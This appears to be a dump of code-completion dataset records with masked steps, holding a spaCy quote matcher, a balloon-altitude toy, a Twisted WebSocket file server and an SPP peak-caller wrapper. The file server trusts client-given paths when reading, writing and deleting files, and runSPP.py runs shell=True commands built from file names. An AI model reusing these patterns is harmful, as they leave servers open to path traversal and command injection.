"step-5": "## Author: Aleem Juma\n\nimport os\nfrom app import app\nimport pandas as pd\n\n# read in the quotes database\nq = pd.read_csv(os.path.join('app','data','quotes_all.csv'), sep=';', skiprows=1, header=0)\n\n# there are a few quote genres that don't occur in the model vocab\n# replace them with appropriate words so the similarity search works\nreplace = {\n 'movingon':'moving',\n 'fathersday': 'fathers',\n 'memorialday': 'memorial',\n 'mothersday': 'mothers',\n 'newyears': 'year',\n 'saintpatricksday': 'ireland',\n 'valentinesday': 'valentine'\n}\nq['GENRE'].replace(to_replace=replace, inplace=True)\n\nimport spacy\nnlp = spacy.load('en_core_web_md')\n# cache the computed tokens for the genres in the dataset\ncache = {genre:nlp(genre) for genre in q.GENRE.unique()}\n\ndef get_similarity(word1, word2):\n '''\n Returns a similarity score between two words\n '''\n tok1 = cache.get(word1, nlp(word1))\n tok2 = cache.get(word2, nlp(word2))\n return tok1.similarity(tok2)\n\ndef get_random_word():\n '''\n Returns a random category label from the data\n '''\n random_word = q['GENRE'].sample(1).iloc[0]\n return random_word\n\ndef get_closest_words(word, choices, n=1):\n '''\n Returns the n closest matches in the model vocab\n Parameters:\n word word to search\n choices available matches\n n number of results to return\n\n Returns:\n A list of n tuples in the form (word (str), similarity (float))\n '''\n app.logger.info(f'Finding closest words to \"{word}\"')\n if word in choices:\n # if the word is already in the list return the same word with 100% match\n return [(word, 1.0)]\n if word in nlp.vocab.strings:\n # if not in the list, find the closest words\n similarities = [(choice, get_similarity(word, choice)) for choice in choices]\n # sort, reverse, and return the top n (word,similarity) tuples\n return sorted(similarities, key=lambda x: x[1])[::-1][:n]\n else:\n app.logger.info(f'Not in model vocab: \"{word}\"')\n # if the requested label isn't in the model vocab, return a random genre\n return [(get_random_word(), 1.0), (word, 0.0)]\n\ndef find_matching_quote(genre, top_n=5):\n '''\n Returns a matching quote and up to 5 of the most similar genres with similarity measures\n Paramters:\n genre genre to match\n\n Returns:\n (str) Quote\n (str) Author\n (list) List of tuples in the form (word (str), simliarity (float))\n '''\n # find closest matches\n matched_genres = get_closest_words(genre, q.GENRE.unique(), top_n)\n # get the best one\n closest = matched_genres[0][0]\n app.logger.info(f'Finding quote for: \"{closest}\"')\n # get a quote from that genre\n matching_quote = q[q['GENRE']==closest].sample(1).iloc[0]\n quote = matching_quote.QUOTE\n author = matching_quote.AUTHOR\n # return the quote and the genres\n return quote, author, matched_genres\n",
"step-ids": [
3,
5,
6,
7,
8
]
}
|
[
3,
5,
6,
7,
8
] |
def alt(h, dt):
t=0
while True:
t=t+1
a=(-6)*(t**4)+ h*(t**3)+2*(t**2)+t
if a<=0:
print('The balloon first touches ground at hour:')
print(t)
break
elif t==dt:
print('The balloon does not touch ground in the given time.')
break
return
alt(int(input()), int(input()))
|
normal
|
{
"blob_id": "592f29f08637e511bd7d49a3b58f69b700721d89",
"index": 8083,
"step-1": "<mask token>\n",
"step-2": "def alt(h, dt):\n t = 0\n while True:\n t = t + 1\n a = -6 * t ** 4 + h * t ** 3 + 2 * t ** 2 + t\n if a <= 0:\n print('The balloon first touches ground at hour:')\n print(t)\n break\n elif t == dt:\n print('The balloon does not touch ground in the given time.')\n break\n return\n\n\n<mask token>\n",
"step-3": "def alt(h, dt):\n t = 0\n while True:\n t = t + 1\n a = -6 * t ** 4 + h * t ** 3 + 2 * t ** 2 + t\n if a <= 0:\n print('The balloon first touches ground at hour:')\n print(t)\n break\n elif t == dt:\n print('The balloon does not touch ground in the given time.')\n break\n return\n\n\nalt(int(input()), int(input()))\n",
"step-4": "def alt(h, dt):\n t=0\n while True:\n t=t+1\n a=(-6)*(t**4)+ h*(t**3)+2*(t**2)+t\n \n if a<=0:\n print('The balloon first touches ground at hour:')\n print(t)\n break\n elif t==dt:\n print('The balloon does not touch ground in the given time.')\n break\n return\nalt(int(input()), int(input()))",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
import os
import sys
import json
from subprocess import Popen, PIPE, STDOUT
from twisted.internet.task import deferLater
from twisted.internet import reactor
from autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol, listenWS
from utils import rsync
# TODO: Add Twisted logger
# TODO: Create plugin for fileserver (using twistd)
# TODO: Thinking about using SSL over my WebSockets message-based protocol (OR using AES algorithm?)
CONFIG_IP = 'localhost'
CONFIG_PORT = 8888
CONFIG_TEMPLATE = ''
CONFIG_DATA = {}
BATCH_SIZE = 1 * 2 ** 20
def sendPrefences(port):
p = Popen(["python", "./utils/preferences_sender.py", str(CONFIG_TEMPLATE), str(port)], stdout=PIPE, stdin=PIPE, stderr=STDOUT)
result = p.communicate()[0]
class MessageBasedServerProtocol(WebSocketServerProtocol):
"""
Message-based WebSockets server
Template contains some parts as string:
[USER_ID:OPERATION_NAME:FILE_ID:FILE_ENC_PASSWORD] - 15 symbols for USER_ID,
10 symbols for OPERATION_NAME,
25 symbols for FILE_ID
32 symbols for FILE_ENC_PASSWORD
other - some data
"""
def __init__(self):
path = CONFIG_DATA['path']
base_dir = CONFIG_DATA['base_dir']
# prepare to working with files...
if os.path.exists(path) and os.path.isdir(path):
os.chdir(path)
if not os.path.exists(base_dir) or not os.path.isdir(base_dir):
os.mkdir(base_dir)
os.chdir(base_dir)
else:
os.mkdir(path)
os.chdir(path)
os.mkdir(base_dir)
os.chdir(base_dir)
# init some things
self.fullpath = path + '/' + base_dir
self.status = 'ONLINE'
self.commands_handlers = self.__initHandlersUser()
self.file_1 = self.file_2 = self.delta_sync = None
self.file_enc_psw = None
def __initHandlersUser(self):
"""
Initialize handlers for every command
"""
handlers = {}
handlers['WRITE_FILE'] = self.write_file
handlers['READU_FILE'] = self.read_file
handlers['DELET_FILE'] = self.delete_file
handlers['STATUS_SRV'] = self.status_server
handlers['RSYNC_FILE'] = self.rsync_file
handlers['WSYNC_FILE'] = self.wsync_file
return handlers
def __checkUserCatalog(self, user_id):
# prepare to working with files...
os.chdir(self.fullpath)
if not os.path.exists(user_id) or not os.path.isdir(user_id):
os.mkdir(user_id)
os.chdir(user_id)
else:
os.chdir(self.fullpath + '/' + user_id)
def __get_standart_states(self):
return "C", 'Succesfull!'
def write_file(self, user_id, file_id, data):
print "[USER] User with %s was write a file..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "WRT"
try:
f = open(file_id, "wb")
f.write(data)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
f.close()
self.status = 'ONLINE'
return operation, status, commentary
def read_file(self, user_id, file_id, data):
print "[USER] User with %s was read a file..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "REA"
try:
f = open(file_id, "rb")
commentary = f.read()
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
f.close()
self.status = 'ONLINE'
return operation, status, commentary
def delete_file(self, user_id, file_id, data):
print "[USER] User with %s was delete a file..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "DEL"
try:
os.remove(file_id)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
self.status = 'ONLINE'
return operation, status, commentary
def rsync_file(self, user_id, file_id, data):
print "[USER] User with %s sync files..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "RSY"
try:
f = open(file_id, "rb")
commentary = f.read()
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
self.status = 'ONLINE'
return operation, status, commentary
def wsync_file(self, user_id, file_id, data):
print "[USER] User with %s sync files..." % (self.transport.getPeer())
status, commentary = self.__get_standart_states()
self.__checkUserCatalog(user_id)
self.status = 'BUSY'
operation = "WRT"
try:
unpatched = open(file_id, "rb")
hashes = rsync.blockchecksums(unpatched)
new_file = file_id + '.new'
swap_path = file_id + '~'
with open(swap_path, "wb") as out_file:
out_file.write(data)
patchedfile = open(swap_path, "rb")
delta = rsync.rsyncdelta(patchedfile, hashes)
unpatched.seek(0)
save_to = open(new_file, "wb")
rsync.patchstream(unpatched, save_to, delta)
save_to.close()
patchedfile.close()
unpatched.close()
if os.path.exists(file_id):
os.remove(file_id)
os.rename(new_file, file_id)
if os.path.exists(swap_path):
os.remove(swap_path)
except IOError, argument:
status = "E"
commentary = argument
except Exception, argument:
status = "E"
commentary = argument
raise Exception(argument)
finally:
print 'WSYNC was ended successfully!'
self.status = 'ONLINE'
return operation, status, commentary
def status_server(self, user_id, file_id, data):
print "[SERV] Server with %s getting fileserver status..." % (self.transport.getPeer())
status = "C"
operation = "STS"
commentary = self.status
return operation, status, commentary
def onOpen(self):
print "[USER] User with %s connected" % (self.transport.getPeer())
def connectionLost(self, reason):
print '[USER] Lost connection from %s' % (self.transport.getPeer())
def onMessage(self, payload, isBinary):
"""
Processing request from user and send response
"""
user_id, cmd, file_id, self.file_enc_psw = payload[:87].replace('[', '').replace(']', '').split(':')
self.file_enc_psw = self.file_enc_psw.replace('~', '')
data = payload[87:]
operation, status, commentary = "UNK", "C", "Successfull!"
if cmd in ('WRITE_FILE', 'READU_FILE', 'DELET_FILE', 'STATUS_SRV', 'RSYNC_FILE', 'WSYNC_FILE'):
operation, status, commentary = self.commands_handlers[cmd](user_id, file_id, data)
self.file_enc_psw = None
self.sendMessage('[%s][%s]%s' % (operation, status, commentary), isBinary=True, sync=True)
if __name__ == '__main__':
if len(sys.argv) < 3:
print "using python fileserver_client.py [PATH_TO_config.json_FILE] [PORT]"
else:
try:
# read config file
CONFIG_TEMPLATE = sys.argv[1]
with open(CONFIG_TEMPLATE, "r") as f:
CONFIG_DATA = json.load(f)
# checking IP and PORT
CONFIG_PORT = int(sys.argv[2])
except ValueError:
print 'PLEASE, enter correct information about server...'
sys.exit(1)
except Exception, e:
print e
sys.exit(1)
if CONFIG_IP == 'localhost':
CONFIG_IP = '127.0.0.1'
server_addr = "ws://%s:%d" % (CONFIG_IP, CONFIG_PORT)
# create server
factory = WebSocketServerFactory(server_addr)
factory.protocol = MessageBasedServerProtocol
listenWS(factory)
# create special Deffered, which sending our server prefences (ip and port) to main server
if bool(CONFIG_DATA["debug"]) is False:
d = deferLater(reactor, 0, sendPrefences, CONFIG_PORT)
reactor.run()
|
normal
|
{
"blob_id": "30251b7c2ce30b7fa899a5885707c078788d0106",
"index": 1956,
"step-1": "import os\nimport sys\nimport json\nfrom subprocess import Popen, PIPE, STDOUT\n\nfrom twisted.internet.task import deferLater\nfrom twisted.internet import reactor\nfrom autobahn.twisted.websocket import WebSocketServerFactory, WebSocketServerProtocol, listenWS\n\nfrom utils import rsync\n\n# TODO: Add Twisted logger\n# TODO: Create plugin for fileserver (using twistd)\n# TODO: Thinking about using SSL over my WebSockets message-based protocol (OR using AES algorithm?)\n\nCONFIG_IP = 'localhost'\nCONFIG_PORT = 8888\nCONFIG_TEMPLATE = ''\nCONFIG_DATA = {}\nBATCH_SIZE = 1 * 2 ** 20\n\n\ndef sendPrefences(port):\n p = Popen([\"python\", \"./utils/preferences_sender.py\", str(CONFIG_TEMPLATE), str(port)], stdout=PIPE, stdin=PIPE, stderr=STDOUT)\n result = p.communicate()[0]\n\n\nclass MessageBasedServerProtocol(WebSocketServerProtocol):\n \"\"\"\n Message-based WebSockets server\n Template contains some parts as string:\n [USER_ID:OPERATION_NAME:FILE_ID:FILE_ENC_PASSWORD] - 15 symbols for USER_ID,\n 10 symbols for OPERATION_NAME,\n 25 symbols for FILE_ID\n 32 symbols for FILE_ENC_PASSWORD\n other - some data\n \"\"\"\n\n def __init__(self):\n path = CONFIG_DATA['path']\n base_dir = CONFIG_DATA['base_dir']\n # prepare to working with files...\n if os.path.exists(path) and os.path.isdir(path):\n os.chdir(path)\n if not os.path.exists(base_dir) or not os.path.isdir(base_dir):\n os.mkdir(base_dir)\n os.chdir(base_dir)\n else:\n os.mkdir(path)\n os.chdir(path)\n os.mkdir(base_dir)\n os.chdir(base_dir)\n # init some things\n self.fullpath = path + '/' + base_dir\n self.status = 'ONLINE'\n self.commands_handlers = self.__initHandlersUser()\n self.file_1 = self.file_2 = self.delta_sync = None\n self.file_enc_psw = None\n\n def __initHandlersUser(self):\n \"\"\"\n Initialize handlers for every command\n \"\"\"\n handlers = {}\n handlers['WRITE_FILE'] = self.write_file\n handlers['READU_FILE'] = self.read_file\n handlers['DELET_FILE'] = self.delete_file\n handlers['STATUS_SRV'] = self.status_server\n handlers['RSYNC_FILE'] = self.rsync_file\n handlers['WSYNC_FILE'] = self.wsync_file\n return handlers\n\n def __checkUserCatalog(self, user_id):\n # prepare to working with files...\n os.chdir(self.fullpath)\n if not os.path.exists(user_id) or not os.path.isdir(user_id):\n os.mkdir(user_id)\n os.chdir(user_id)\n else:\n os.chdir(self.fullpath + '/' + user_id)\n\n def __get_standart_states(self):\n return \"C\", 'Succesfull!'\n\n def write_file(self, user_id, file_id, data):\n print \"[USER] User with %s was write a file...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"WRT\"\n try:\n f = open(file_id, \"wb\")\n f.write(data)\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n finally:\n f.close()\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def read_file(self, user_id, file_id, data):\n print \"[USER] User with %s was read a file...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"REA\"\n try:\n f = open(file_id, \"rb\")\n commentary = f.read()\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n finally:\n f.close()\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def delete_file(self, user_id, file_id, data):\n print \"[USER] User with %s was delete a file...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"DEL\"\n try:\n os.remove(file_id)\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def rsync_file(self, user_id, file_id, data):\n print \"[USER] User with %s sync files...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"RSY\"\n try:\n f = open(file_id, \"rb\")\n commentary = f.read()\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def wsync_file(self, user_id, file_id, data):\n print \"[USER] User with %s sync files...\" % (self.transport.getPeer())\n status, commentary = self.__get_standart_states()\n self.__checkUserCatalog(user_id)\n self.status = 'BUSY'\n operation = \"WRT\"\n try:\n unpatched = open(file_id, \"rb\")\n hashes = rsync.blockchecksums(unpatched)\n\n new_file = file_id + '.new'\n swap_path = file_id + '~'\n with open(swap_path, \"wb\") as out_file:\n out_file.write(data)\n\n patchedfile = open(swap_path, \"rb\")\n delta = rsync.rsyncdelta(patchedfile, hashes)\n\n unpatched.seek(0)\n save_to = open(new_file, \"wb\")\n rsync.patchstream(unpatched, save_to, delta)\n\n save_to.close()\n patchedfile.close()\n unpatched.close()\n\n if os.path.exists(file_id):\n os.remove(file_id)\n\n os.rename(new_file, file_id)\n\n if os.path.exists(swap_path):\n os.remove(swap_path)\n except IOError, argument:\n status = \"E\"\n commentary = argument\n except Exception, argument:\n status = \"E\"\n commentary = argument\n raise Exception(argument)\n finally:\n print 'WSYNC was ended successfully!'\n self.status = 'ONLINE'\n return operation, status, commentary\n\n def status_server(self, user_id, file_id, data):\n print \"[SERV] Server with %s getting fileserver status...\" % (self.transport.getPeer())\n status = \"C\"\n operation = \"STS\"\n commentary = self.status\n return operation, status, commentary\n\n def onOpen(self):\n print \"[USER] User with %s connected\" % (self.transport.getPeer())\n\n def connectionLost(self, reason):\n print '[USER] Lost connection from %s' % (self.transport.getPeer())\n\n def onMessage(self, payload, isBinary):\n \"\"\"\n Processing request from user and send response\n \"\"\"\n user_id, cmd, file_id, self.file_enc_psw = payload[:87].replace('[', '').replace(']', '').split(':')\n self.file_enc_psw = self.file_enc_psw.replace('~', '')\n data = payload[87:]\n operation, status, commentary = \"UNK\", \"C\", \"Successfull!\"\n if cmd in ('WRITE_FILE', 'READU_FILE', 'DELET_FILE', 'STATUS_SRV', 'RSYNC_FILE', 'WSYNC_FILE'):\n operation, status, commentary = self.commands_handlers[cmd](user_id, file_id, data)\n self.file_enc_psw = None\n self.sendMessage('[%s][%s]%s' % (operation, status, commentary), isBinary=True, sync=True)\n\nif __name__ == '__main__':\n if len(sys.argv) < 3:\n print \"using python fileserver_client.py [PATH_TO_config.json_FILE] [PORT]\"\n else:\n try:\n # read config file\n CONFIG_TEMPLATE = sys.argv[1]\n with open(CONFIG_TEMPLATE, \"r\") as f:\n CONFIG_DATA = json.load(f)\n # checking IP and PORT\n CONFIG_PORT = int(sys.argv[2])\n except ValueError:\n print 'PLEASE, enter correct information about server...'\n sys.exit(1)\n except Exception, e:\n print e\n sys.exit(1)\n if CONFIG_IP == 'localhost':\n CONFIG_IP = '127.0.0.1'\n server_addr = \"ws://%s:%d\" % (CONFIG_IP, CONFIG_PORT)\n # create server\n factory = WebSocketServerFactory(server_addr)\n factory.protocol = MessageBasedServerProtocol\n listenWS(factory)\n # create special Deffered, which sending our server prefences (ip and port) to main server\n if bool(CONFIG_DATA[\"debug\"]) is False:\n d = deferLater(reactor, 0, sendPrefences, CONFIG_PORT)\n reactor.run()\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
'''
runSPP.py - wrap spp peak caller
========================================
:Tags: Python
Purpose
-------
Runs the spp peak caller.
The workflow follows the tutorial at:
http://compbio.med.harvard.edu/Supplements/ChIP-seq/tutorial.html
Usage
-----
Documentation
-------------
Requirements:
* spp >= ?
* snow >= 0.3.13
* bedtools >= 2.21.0
Code
----
'''
import os
import sys
import subprocess
import collections
from cgatcore import experiment as E
from rpy2.robjects import r as R
def bamToBed(infile, outfile):
'''convert bam to bed with bedtools.'''
statement = "bamToBed -i %(infile)s > %(outfile)s" % locals()
E.debug("executing statement '%s'" % statement)
retcode = subprocess.call(statement,
cwd=os.getcwd(),
shell=True)
if retcode < 0:
raise OSError("Child was terminated by signal %i: \n%s\n" %
(-retcode, statement))
return outfile
SPPPeak = collections.namedtuple(
"SPPPeak",
"contig unrefined_start unrefined_end strand "
"posterior summit height refined_start refined_end median fdr")
def iteratePeaks(infile):
'''iterate of zinba peaks in infile.'''
for line in infile:
if line.startswith("#"):
continue
if line.startswith("PEAKID\tChrom"):
continue
# skip empty lines
if line.startswith("\n"):
continue
data = line[:-1].split("\t")
if len(data) != 12:
raise ValueError("could not parse line %s" % line)
# I assume these are 1-based coordinates
data[2] = max(int(data[2]) - 1, 0)
# end
data[3] = int(data[3])
# posterior
data[5] = float(data[5])
# summit
data[6] = max(int(data[6]) - 1, 0)
# height
data[7] = int(data[7])
# refined_start
data[8] = max(int(data[8]) - 1, 0)
# end
data[9] = int(data[9])
# median
data[10] = int(data[10])
# qvalue
data[11] = float(data[11])
yield SPPPeak._make(data[1:])
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-f", "--input-format", dest="input_format",
type="choice",
choices=("bam",),
help="input file format [default=%default].")
parser.add_option("-w", "--window-size", dest="window_size", type="int",
help="window size [default=%default].")
parser.add_option("-c", "--control-filename",
dest="control_filename",
type="string",
help="filename of input/control data in "
"bed format [default=%default].")
parser.add_option("-t", "--threads", dest="threads", type="int",
help="number of threads to use [default=%default].")
parser.add_option("-q", "--fdr-threshold",
dest="fdr_threshold", type="float",
help="fdr threshold [default=%default].")
parser.add_option("-z", "--spp-z-threshold", dest="z_threshold", type="float",
help="z threshold [default=%default].")
parser.add_option("--bin", dest="bin", type="int",
help="bin tags within the specified number "
" of basepairs to speed up calculation;"
" increasing bin size decreases the accuracy "
"of the determined parameters [default=%default]")
parser.add_option("--spp-srange-min", dest="srange_min", type="float",
help="srange gives the possible range for the "
" size of the protected region;"
" srange should be higher than tag length; "
" making the upper boundary too high"
" will increase calculation time [%default]")
parser.add_option("--spp-srange-max", dest="srange_max", type="float",
help="srange gives the possible range for the "
" size of the protected region;"
" srange should be higher than tag length; "
" making the upper boundary too high"
" will increase calculation time [%default]")
parser.set_defaults(
input_format="bam",
threads=1,
fdr_threshold=0.05,
window_size=1000,
offset=125,
srange_min=50,
srange_max=500,
bin=5,
z_threshold=3,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
"please specify a filename with sample data and an output file")
filename_sample, filename_output = args[0], args[1]
filename_control = options.control_filename
# load Zinba
R.library('spp')
R.library('snow')
# read data
E.info("reading data")
R('''chip.data <- read.bam.tags('%s')''' % filename_sample)
R('''input.data <- read.bam.tags('%s')''' % filename_control)
R('''cluster = makeCluster( %i )''' % (options.threads))
E.info("computing binding characteristics")
# get binding info from cross-correlation profile
# srange gives the possible range for the size of the protected region;
# srange should be higher than tag length; making the upper boundary too
# high will increase calculation time
# bin - bin tags within the specified number of basepairs to speed
# up calculation; increasing bin size decreases the accuracy of
# the determined parameters
srange_min, srange_max = options.srange_min, options.srange_max
bin = options.bin
R('''binding.characteristics <- get.binding.characteristics(chip.data,
srange=c(%(srange_min)i,%(srange_max)i),
bin=%(bin)s,
cluster=cluster);''' % locals())
# print out binding peak separation distance
options.stdout.write(
"shift\t%i\n" % R('''binding.characteristics$peak$x''')[0])
##################################################
##################################################
##################################################
E.info("plot cross correlation profile")
# plot cross-correlation profile
R('''pdf(file="%s.crosscorrelation.pdf",width=5,height=5)''' %
filename_output)
R('''par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);''')
R('''plot(binding.characteristics$cross.correlation,
type='l',
xlab="strand shift",
ylab="cross-correlation");''')
R('''abline(v=binding.characteristics$peak$x,lty=2,col=2)''')
R('''dev.off();''')
E.info("selecting informative tags based on the binding characteristics")
# select informative tags based on the binding characteristics
R('''chip.data <- select.informative.tags(
chip.data,binding.characteristics);''')
R('''input.data <- select.informative.tags(
input.data,binding.characteristics);''')
E.info("outputting broad peaks")
window_size, z_threshold = options.window_size, options.z_threshold
R('''broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,
window.size=%(window_size)i,
z.thr=%(z_threshold)f,
tag.shift=round(binding.characteristics$peak$x/2))''' % locals())
# write out in broadPeak format
R('''write.broadpeak.info(broad.clusters,"%s.broadpeak.txt")''' %
filename_output)
# binding detection parameters desired FDR (1%). Alternatively, an
# E-value can be supplied to the method calls below instead of the
# fdr parameter the binding.characteristics contains the optimized
# half-size for binding detection window
R('''detection.window.halfsize <- binding.characteristics$whs;''')
# determine binding positions using wtd method
E.info("determining binding positions using wtd method")
fdr = options.fdr_threshold
R('''bp <- find.binding.positions(
signal.data=chip.data,control.data=input.data,
fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)''' % locals())
options.stdout.write("detected_peaks\t%i\n" % R(
'''sum(unlist(lapply(bp$npl,function(d) length(d$x))))''')[0])
# output detected binding positions
R('''output.binding.results(bp,"%s.summit.txt");''' % filename_output)
R('''bp <- add.broad.peak.regions(chip.data,input.data,bp,
window.size=%(window_size)i,z.thr=%(z_threshold)f)''' % locals())
# output using narrowPeak format
R('''write.narrowpeak.binding(bp,"%s.narrowpeak.txt")''' %
filename_output)
# write footer and output benchmark information.
E.stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
|
normal
|
{
"blob_id": "e886b88a0b7e8c06772fe8a9554cab1bfe9e94a7",
"index": 7208,
"step-1": "<mask token>\n\n\ndef bamToBed(infile, outfile):\n \"\"\"convert bam to bed with bedtools.\"\"\"\n statement = 'bamToBed -i %(infile)s > %(outfile)s' % locals()\n E.debug(\"executing statement '%s'\" % statement)\n retcode = subprocess.call(statement, cwd=os.getcwd(), shell=True)\n if retcode < 0:\n raise OSError('Child was terminated by signal %i: \\n%s\\n' % (-\n retcode, statement))\n return outfile\n\n\n<mask token>\n\n\ndef iteratePeaks(infile):\n \"\"\"iterate of zinba peaks in infile.\"\"\"\n for line in infile:\n if line.startswith('#'):\n continue\n if line.startswith('PEAKID\\tChrom'):\n continue\n if line.startswith('\\n'):\n continue\n data = line[:-1].split('\\t')\n if len(data) != 12:\n raise ValueError('could not parse line %s' % line)\n data[2] = max(int(data[2]) - 1, 0)\n data[3] = int(data[3])\n data[5] = float(data[5])\n data[6] = max(int(data[6]) - 1, 0)\n data[7] = int(data[7])\n data[8] = max(int(data[8]) - 1, 0)\n data[9] = int(data[9])\n data[10] = int(data[10])\n data[11] = float(data[11])\n yield SPPPeak._make(data[1:])\n\n\ndef main(argv=None):\n \"\"\"script main.\n\n parses command line options in sys.argv, unless *argv* is given.\n \"\"\"\n if not argv:\n argv = sys.argv\n parser = E.OptionParser(version='%prog version: $Id$', usage=globals()[\n '__doc__'])\n parser.add_option('-f', '--input-format', dest='input_format', type=\n 'choice', choices=('bam',), help=\n 'input file format [default=%default].')\n parser.add_option('-w', '--window-size', dest='window_size', type='int',\n help='window size [default=%default].')\n parser.add_option('-c', '--control-filename', dest='control_filename',\n type='string', help=\n 'filename of input/control data in bed format [default=%default].')\n parser.add_option('-t', '--threads', dest='threads', type='int', help=\n 'number of threads to use [default=%default].')\n parser.add_option('-q', '--fdr-threshold', dest='fdr_threshold', type=\n 'float', help='fdr threshold [default=%default].')\n parser.add_option('-z', '--spp-z-threshold', dest='z_threshold', type=\n 'float', help='z threshold [default=%default].')\n parser.add_option('--bin', dest='bin', type='int', help=\n 'bin tags within the specified number of basepairs to speed up calculation; increasing bin size decreases the accuracy of the determined parameters [default=%default]'\n )\n parser.add_option('--spp-srange-min', dest='srange_min', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.add_option('--spp-srange-max', dest='srange_max', type='float',\n help=\n 'srange gives the possible range for the size of the protected region; srange should be higher than tag length; making the upper boundary too high will increase calculation time [%default]'\n )\n parser.set_defaults(input_format='bam', threads=1, fdr_threshold=0.05,\n window_size=1000, offset=125, srange_min=50, srange_max=500, bin=5,\n z_threshold=3)\n options, args = E.start(parser, argv=argv)\n if len(args) != 2:\n raise ValueError(\n 'please specify a filename with sample data and an output file')\n filename_sample, filename_output = args[0], args[1]\n filename_control = options.control_filename\n R.library('spp')\n R.library('snow')\n E.info('reading data')\n R(\"chip.data <- read.bam.tags('%s')\" % filename_sample)\n R(\"input.data <- read.bam.tags('%s')\" % filename_control)\n R('cluster = makeCluster( %i )' % options.threads)\n E.info('computing binding characteristics')\n srange_min, srange_max = options.srange_min, options.srange_max\n bin = options.bin\n R(\n \"\"\"binding.characteristics <- get.binding.characteristics(chip.data,\n srange=c(%(srange_min)i,%(srange_max)i),\n bin=%(bin)s,\n cluster=cluster);\"\"\"\n % locals())\n options.stdout.write('shift\\t%i\\n' % R('binding.characteristics$peak$x')[0]\n )\n E.info('plot cross correlation profile')\n R('pdf(file=\"%s.crosscorrelation.pdf\",width=5,height=5)' % filename_output)\n R('par(mar = c(3.5,3.5,1.0,0.5), mgp = c(2,0.65,0), cex = 0.8);')\n R(\"\"\"plot(binding.characteristics$cross.correlation,\n type='l',\n xlab=\"strand shift\",\n ylab=\"cross-correlation\");\"\"\"\n )\n R('abline(v=binding.characteristics$peak$x,lty=2,col=2)')\n R('dev.off();')\n E.info('selecting informative tags based on the binding characteristics')\n R(\"\"\"chip.data <- select.informative.tags(\n chip.data,binding.characteristics);\"\"\"\n )\n R(\"\"\"input.data <- select.informative.tags(\n input.data,binding.characteristics);\"\"\"\n )\n E.info('outputting broad peaks')\n window_size, z_threshold = options.window_size, options.z_threshold\n R(\n \"\"\"broad.clusters <- get.broad.enrichment.clusters(chip.data,input.data,\n window.size=%(window_size)i,\n z.thr=%(z_threshold)f,\n tag.shift=round(binding.characteristics$peak$x/2))\"\"\"\n % locals())\n R('write.broadpeak.info(broad.clusters,\"%s.broadpeak.txt\")' %\n filename_output)\n R('detection.window.halfsize <- binding.characteristics$whs;')\n E.info('determining binding positions using wtd method')\n fdr = options.fdr_threshold\n R(\n \"\"\"bp <- find.binding.positions(\n signal.data=chip.data,control.data=input.data,\n fdr=%(fdr)f,whs=detection.window.halfsize,cluster=cluster)\"\"\"\n % locals())\n options.stdout.write('detected_peaks\\t%i\\n' % R(\n 'sum(unlist(lapply(bp$npl,function(d) length(d$x))))')[0])\n R('output.binding.results(bp,\"%s.summit.txt\");' % filename_output)\n R(\n \"\"\"bp <- add.broad.peak.regions(chip.data,input.data,bp,\n window.size=%(window_size)i,z.thr=%(z_threshold)f)\"\"\"\n % locals())\n R('write.narrowpeak.binding(bp,\"%s.narrowpeak.txt\")' % filename_output)\n E.stop()\n\n\n<mask token>\n",
